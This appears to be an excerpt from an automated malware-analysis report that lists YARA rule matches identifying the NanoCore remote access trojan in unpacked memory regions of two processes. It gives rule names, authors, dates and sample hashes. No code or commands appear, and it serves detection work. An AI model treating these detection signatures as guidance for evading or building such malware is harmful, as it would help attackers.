Source: 5.2.vbc.exe.4430000.9.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 7.2.opjlpsercy.exe.3173258.5.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.2.opjlpsercy.exe.3173258.5.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.opjlpsercy.exe.3173258.5.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 5.2.vbc.exe.55d0000.22.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.vbc.exe.55d0000.22.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 6.2.opjlpsercy.exe.1c80000.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 6.2.opjlpsercy.exe.1c80000.3.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 5.2.vbc.exe.22115c4.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.vbc.exe.22115c4.4.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 5.2.vbc.exe.222265c.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.vbc.exe.222265c.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.opjlpsercy.exe.3346174.6.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.2.opjlpsercy.exe.3346174.6.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 7.2.opjlpsercy.exe.43a0000.9.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.2.opjlpsercy.exe.43a0000.9.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.opjlpsercy.exe.43a0000.9.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 7.2.opjlpsercy.exe.43a0000.9.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.2.opjlpsercy.exe.43a0000.9.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.opjlpsercy.exe.43a0000.9.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 5.2.vbc.exe.57be8a4.28.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.vbc.exe.57be8a4.28.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.opjlpsercy.exe.21a7c2c.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.2.opjlpsercy.exe.21a7c2c.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.opjlpsercy.exe.21a7c2c.4.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 5.2.vbc.exe.5070000.17.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.vbc.exe.5070000.17.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.vbc.exe.222265c.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.vbc.exe.222265c.3.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 7.2.opjlpsercy.exe.219b958.2.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.2.opjlpsercy.exe.219b958.2.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.vbc.exe.33c5116.7.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 7.2.opjlpsercy.exe.3335116.7.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.2.opjlpsercy.exe.3335116.7.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 5.2.vbc.exe.33c9f42.6.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.vbc.exe.33c9f42.6.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 5.2.vbc.exe.57b4c9f.30.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.vbc.exe.57b4c9f.30.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.opjlpsercy.exe.219b958.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.2.opjlpsercy.exe.219b958.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.opjlpsercy.exe.219b958.2.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 5.2.vbc.exe.57b0000.29.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.vbc.exe.57b0000.29.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.vbc.exe.44c0000.10.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.vbc.exe.44c0000.10.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.vbc.exe.44c0000.10.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 5.2.vbc.exe.55d0000.22.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.vbc.exe.55d0000.22.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.vbc.exe.415058.0.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.vbc.exe.415058.0.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.vbc.exe.415058.0.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 5.2.vbc.exe.55c0000.21.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.vbc.exe.55c0000.21.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.1.opjlpsercy.exe.415058.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.1.opjlpsercy.exe.415058.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.1.opjlpsercy.exe.415058.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 4.2.vbc.exe.1da0000.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 4.2.vbc.exe.1da0000.3.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 5.2.vbc.exe.5620000.25.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.vbc.exe.5620000.25.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.1.vbc.exe.415058.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.1.vbc.exe.415058.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.1.vbc.exe.415058.1.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 5.2.vbc.exe.5460000.19.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.vbc.exe.5460000.19.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.vbc.exe.1db1458.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 4.2.vbc.exe.1db1458.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.vbc.exe.1db1458.4.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 5.2.vbc.exe.55c0000.21.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.vbc.exe.55c0000.21.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.opjlpsercy.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.2.opjlpsercy.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 5.2.vbc.exe.4c60000.13.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.vbc.exe.4c60000.13.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.opjlpsercy.exe.3339f42.8.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.2.opjlpsercy.exe.3339f42.8.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 7.2.opjlpsercy.exe.4430000.10.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.2.opjlpsercy.exe.4430000.10.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.opjlpsercy.exe.4430000.10.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 7.2.opjlpsercy.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.2.opjlpsercy.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 7.2.opjlpsercy.exe.3346174.6.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
